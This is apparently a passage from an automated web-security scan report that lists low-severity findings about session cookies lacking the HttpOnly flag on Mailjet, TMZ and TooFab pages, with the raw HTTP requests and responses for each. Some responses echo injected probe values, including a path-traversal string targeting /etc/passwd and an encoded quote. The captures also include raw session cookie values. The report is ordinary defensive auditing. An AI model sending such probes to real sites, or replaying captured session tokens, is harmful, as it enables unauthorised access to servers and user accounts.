<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Mailjet : Real-time Emailing
...[SNIP]...

12.17. http://www.mailjet.com/pricing  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mailjet.com
Path:   /pricing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pricing HTTP/1.1
Host: www.mailjet.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/features
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=170C5t%2BzRJJ5t%2FWv1ULaD7bK8ItpVy7iytSGyaHePyLTX3sJaU19v5y8r3EqdHTwSZqUba4mEDAu6RDO9Yume6Q36MZp83YIr9SG%2FlelT9kxkMl79h2fHQh0O99uPuUyb0tsP0Am4hqjnlwkjdwf3bKJEh5B4ef6HZGtsFVnueph1WcP2gdunPQaT9H2VRZjw2pSGuUM6ZZDJhb1sxZ5OXehfHhdgKf66xZbmq4SMsKU%2FAtkCbqGWzWB852Yjqf4WEj%2BRsv69x9nkcCHxWvHd1TVykmWxj2ueoG6%2F8GzE45ZTkb8dsc9YMpK5gpeXkmX6S02L0Ej7oGv847c92MA54RQPQDrWdNNKWh0o0dYCYrNIh56EJz8ptb%2F0P4py9guha4Joj1q%2F05fAK4M1gcl3VB8FHX1awSWpfQfK7JrK5%2FA0qyaJ0ss4jP3CQaDDo%2BFSKPSdP4Qa05YuQh2Wz%2BA6O4Gcqc2kFssi3b8JHpsBkWyN0pVa3MtlhaDtzLZQIUrsUYXs6zSxXwoPEbQ7UlMzMvBZJTAR39lBjutvOvY810HOw98wbRhbDR%2BqD8FSjECOcFI3dwqrLkbnurRGcgvV5DQWTaP9PiIbUAdzzNx1Tg5yjruOvau6y4p7H5u9Zj7; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.2.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:54:53 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=ue8DwvgMWj3limxfE4emkc%2Bezm%2B9mVnU%2FVoqCwNRZiiMnbi9ugqDp6%2FHctqrJKdkVhhzWLhZIYqvV8VtE5HormQSeGnd4V7fV0vXi1RwUgvmfAKIz4GwwMjQ84mEQzp0JsUa96%2Fl2PR9k5%2BOk6WT3hefeiCrKnbfqoHUQb9ygs0sjfnn4mVuYVXwDg3%2B8LrQC5swXDqzquzXXFp9NM1LSA1qen45s1F2PprXAmVxULCj%2FqTlKHWUxK%2FCujHVLgIX3QaHWvBpH5y7UxTxintKiXaCW3xJzPaP9EzmPSvzjfEflPWhyC2VyUmV11fXShRG7FK25Ur4HmeQYJdJUzWHzG3OzBRBuuLy7%2FsgsLz73rneCrTBtaE0j4Izx5POpBgHKaQvzv6rrmpn7fImRObB0ieRTw8KoAN7iaU4ZWYi4QXrdvEibUV1xax0xS%2FSa1ToPtH41IbEET25cAW8VjLsXyxdr6gwo4PladoWYA3j4Dj4E9NiCUrXLHfNogcpi5jN94yClibewZHh3k%2Fa5cJaUdr1JxAsD2L2D%2FzW1R%2FKnlS%2FTgwVa%2BW4EefBnKq%2BobeDWBOnGcmwjjWy647PhbabVd4z6jG3QS2E1ysRk5ajn1%2FCHhV01AEpshLxUtBRpcHL; expires=Fri, 23-Sep-2011 21:54:54 GMT; path=/; domain=.mailjet.com
Content-Type: text/html; charset=utf-8
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Pricing plans - mailjet.com</
...[SNIP]...

12.18. https://www.mailjet.com/signup  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.mailjet.com
Path:   /signup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /signup HTTP/1.1
Host: www.mailjet.com
Connection: keep-alive
Referer: http://www.mailjet.com/pricing
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.mailjet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=ue8DwvgMWj3limxfE4emkc%2Bezm%2B9mVnU%2FVoqCwNRZihPBS2aHbLPcJsh6zMrtsk5VBdWC2Q4%2FkY28R9i6SSa8dGAVUF8%2FPHumHv5F7VKYeMBcuJ3ocAQC8%2F1zpjTEa2eAIF2%2Fd1MaVsJjlYd%2BEvlsPy4Bruem8u21CL9yz8Ap%2Bo%2BCyjRIR52HCoEp7Gk2hMyvFZOK%2Fjx%2BGyh7%2Fsu8NFSZJ6LqVEMBAyL0NbwqKufi7iGB%2Fv%2F9tP9%2BJn57nRT7jf0OSu%2BSPaMMJ8CfmvGgjKuJr3Z3pjiI0Og8n2P%2BMDPxM5rZyhpW1H5bV6WiztfbkT5g%2BTxq5Sr9hjD093jyLRosfaux9DQuY9RcGBtBWydBnI%2FakIBZf1Gn%2FuhZ530ibuwBdDE3AAckB%2BX%2BQrsXYlox4bwiU%2BKUBCyOImviEfwVersfFPKJQTWs9BG6BLGawt5EAPShjQ3ZpGsRqD6D4DgBt8uEV0jSSUO5Nj9HsCmW6vnbM9Bc%2BhVI8FqYz2j4YkPtqWtgVhuS41Vo00JKJGreh2otpfEl3yl5R6F7KRY3%2BGclQqwvpHsWkNErB2NRzbFk4I3S%2FINHLVFnH2fvlkerYTMa%2B6iqgaqFGiaNLmKiqxdhh5hbqRCvPphR8CMT7hL; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.3.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

plan_id=38

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:55:01 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=iQluRDaaB5M5AYtNJtKxLETKPFlyZG2Bb7aOz31g0XcJh051qecDn7WucsCQ5sPWMgov3crx%2Fe%2FVKHsfCKjgl0ts693dBbaw%2Bn8Z%2FZBRorc9S8yidBGGXRaEhLryAJRKXu8%2BmD5MfSSdUTArbPeuXqQTjl2%2Bz9Sps1DERl3gEQpRfzJHQU4%2FwSwXV%2FxG%2F%2B%2FxrLfIRvU4YGR9sNKRhV7Tp8y6xVR%2F406%2FF0NJNO84XVNcH7wVgIoZ%2BDtc6ZqtqYfZNbZ%2Ffsn12Ti6F3wqJfDXrfqEvwXlxxkIL3LWxFPMBsj6GRMSN5Beq9y%2BPikxBZWSpq8SNFZCwRQuOf2iioO708BZnv4AmSVUO2TA2qNfgYDSH75LdyKerW%2BnqWtmWbNib2Ke0irqnRb2LZXI7vbN%2FqlLnObWTqNDuveaarqUwcND3a%2FSRhy9MB5hAXw5SRtmg69SfaKU5IXFco%2F3%2B7CnWJ%2F%2F7VWiEY9c4oqHIUD7f6HMgacyF5JKG%2BefqhRdjC8skgLWP1T%2F07KLzZIrP0dZRJgsTMBLpI%2FYkzvF6CxdxpufVXy5MYalpKk2AIm85yqTw1398l%2Fx3tDNeDOW8EJ4D6%2Fj86oVOWSL2aNXti%2FfnM7wXf2BD9wgdi6H8bNR5Xbf; expires=Fri, 23-Sep-2011 21:55:01 GMT; path=/; domain=.mailjet.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Sign up for a free - mailjet.
...[SNIP]...

12.19. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tmz.com
Path:   /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=467a26e36b344d031207fb454f356be4&rdid=231534154&type=YLD_def_ch&in-site=true&req_id=da23b34cfa8657c71e50520363d1bbbe&agent=blog_JS_rec&recMode=4&reqType=1&wid=100&imgType=0&refPub=347&prs=false&scp=false&version=42206&idx=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero3; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DMichaele%252520Salahi%252520--%252520%252526%252523039%25253BWild%252520Sex%252526%252523039%25253B%252520Claims%252520with%252520Journey%252520Guitarist%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:18 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff7c43ff78cfa8bd07; expires=Sun, 20-Feb-2028 01:00:18 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112256
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...

12.20. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tmz.com
Path:   /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero2; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DRon%252520Artest%252520--%252520Name%252520Change%252520Official%252520...%252520Say%252520Hello%252520to%252520World%252520Peace%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-ch%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:47 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:47 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff1d45dc9035b97879; expires=Sun, 20-Feb-2028 00:58:47 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115459
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...

12.21. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tmz.com
Path:   /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero3; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253D%252526%252523039%25253BNCIS%252526%252523039%25253B%252520Actor%252520--%252520Dead%252520Mother%252520Insult%252520Led%252520to%252520Violence%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-i%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:46 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:46 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562effac2cf8f69d82c880; expires=Sun, 20-Feb-2028 01:00:46 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115860
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...

12.22. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tmz.com
Path:   /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_sq=wbrostmz%3D%2526pid%253DCelebrity%252520Gossip%252520%25257C%252520Entertainment%252520News%252520%25257C%252520Celebrity%252520News%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:56:17 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:56:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:56:17 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112027
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...

12.23. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tmz.com
Path:   /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_sq=wbrostmz%3D%2526pid%253DNancy%252520Grace%252520--%252520RUMPSHAKIN%252526%252523039%25253B%252520in%252520the%252520TMZ%252520Ballroom%252521%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petit_2%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:11 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:11 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:58:11 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 111374
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...

12.24. http://www.tmz.com/reset-password/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tmz.com
Path:   /reset-password/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reset-password/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero1; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DSign%252520In%252520%25253A%252520TMZ%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/reset-password/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:03:54 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:03:55 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; expires=Sun, 20-Feb-2028 01:03:54 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 57490
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text
...[SNIP]...

12.25. http://www.tmz.com/signin/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tmz.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero1; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DJustin%252520Timberlake%25253A%252520%252520Not%252520My%252520Penis%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/signin/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:02:07 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:02:07 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2%2527; expires=Sun, 20-Feb-2028 01:02:07 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 49975
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text
...[SNIP]...

12.26. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.toofab.com
Path:   /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DCeleb%252520Couples%252520%25257C%252520tooFab%252521%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:08:42 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:08:42 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; expires=Sun, 20-Feb-2028 01:08:42 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 41681
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
